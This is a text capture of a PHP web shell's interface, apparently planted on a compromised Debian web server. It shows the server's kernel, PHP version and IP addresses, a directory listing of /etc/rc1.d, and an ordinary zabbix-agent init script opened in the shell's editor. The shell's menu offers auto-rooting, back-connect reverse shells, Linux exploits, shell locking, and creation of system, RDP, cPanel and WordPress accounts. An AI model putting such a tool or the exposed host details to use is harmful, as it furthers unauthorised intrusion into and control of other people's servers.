Linux biogene 3.16.0-11-amd64 #1 SMP Debian 3.16.84-1 (2020-06-09) x86_64
Apache
: 46.101.124.208 | : 3.145.33.99
Cant Read [ /etc/named.conf ]
5.6.40-0+deb8u12
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
rc1.d /
[ HOME SHELL ]
Name
Size
Permission
Action
K01acct
1.82
KB
-rwxr-xr-x
K01amavis
3.56
KB
-rwxr-xr-x
K01amavis-mc
4.36
KB
-rwxr-xr-x
K01amavisd-snmp-subagent
4.54
KB
-rwxr-xr-x
K01apache2
9.95
KB
-rwxr-xr-x
K01atd
1.05
KB
-rwxr-xr-x
K01cloud-config
1.3
KB
-rwxr-xr-x
K01cloud-final
1.46
KB
-rwxr-xr-x
K01cloud-init
1.32
KB
-rwxr-xr-x
K01cloud-init-local
1.23
KB
-rwxr-xr-x
K01fail2ban
6.23
KB
-rwxr-xr-x
K01gdomap
1.56
KB
-rwxr-xr-x
K01iredapd
2.06
KB
-rwxr-xr-x
K01irqbalance
1.88
KB
-rwxr-xr-x
K01postfix
7.32
KB
-rwxr-xr-x
K01proftpd
5.14
KB
-rwxr-xr-x
K01vsftpd
1.98
KB
-rwxr-xr-x
K01zabbix-agent
1.35
KB
-rwxr-xr-x
K02dovecot
5.12
KB
-rwxr-xr-x
K02spamassassin
1.89
KB
-rwxr-xr-x
K03mysql
5.36
KB
-rwxr-xr-x
K03slapd
5.05
KB
-rwxr-xr-x
K05rsyslog
2.73
KB
-rwxr-xr-x
K07nfs-common
5.53
KB
-rwxr-xr-x
K07rpcbind
2.45
KB
-rwxr-xr-x
README
369
B
-rw-r--r--
S01killprocs
1.27
KB
-rwxr-xr-x
S01motd
995
B
-rwxr-xr-x
S05bootlogs
1.25
KB
-rwxr-xr-x
S06single
597
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : K01zabbix-agent
#! /bin/sh ### BEGIN INIT INFO # Provides: zabbix-agent # Required-Start: $remote_fs $network # Required-Stop: $remote_fs # Default-Start: 2 3 4 5 # Default-Stop: 0 1 6 # Short-Description: Start zabbix-agent daemon ### END INIT INFO set -e NAME=zabbix_agentd DAEMON=/usr/sbin/$NAME DESC="Zabbix agent" test -x $DAEMON || exit 0 DIR=/var/run/zabbix PID=$DIR/$NAME.pid RETRY=15 if test ! -d "$DIR"; then mkdir -p "$DIR" chown -R zabbix:zabbix "$DIR" fi export PATH="${PATH:+$PATH:}/usr/sbin:/sbin" # define LSB log_* functions. . /lib/lsb/init-functions if [ -r "/etc/default/zabbix-agent" ]; then . /etc/default/zabbix-agent fi case "$1" in start) log_daemon_msg "Starting $DESC" "$NAME" start-stop-daemon --oknodo --start --pidfile $PID --exec $DAEMON >/dev/null 2>&1 case "$?" in 0) log_end_msg 0 ;; *) log_end_msg 1; exit 1 ;; esac ;; stop) log_daemon_msg "Stopping $DESC" "$NAME" start-stop-daemon --oknodo --stop --pidfile $PID --retry $RETRY case "$?" in 0) log_end_msg 0 ;; *) log_end_msg 1; exit 1 ;; esac ;; status) status_of_proc -p "$PID" "$DAEMON" "$NAME" && exit 0 || exit $? ;; restart|force-reload) $0 stop $0 start ;; *) echo "Usage: /etc/init.d/$NAME {start|stop|restart|force-reload}" >&2 exit 1 ;; esac exit 0
Close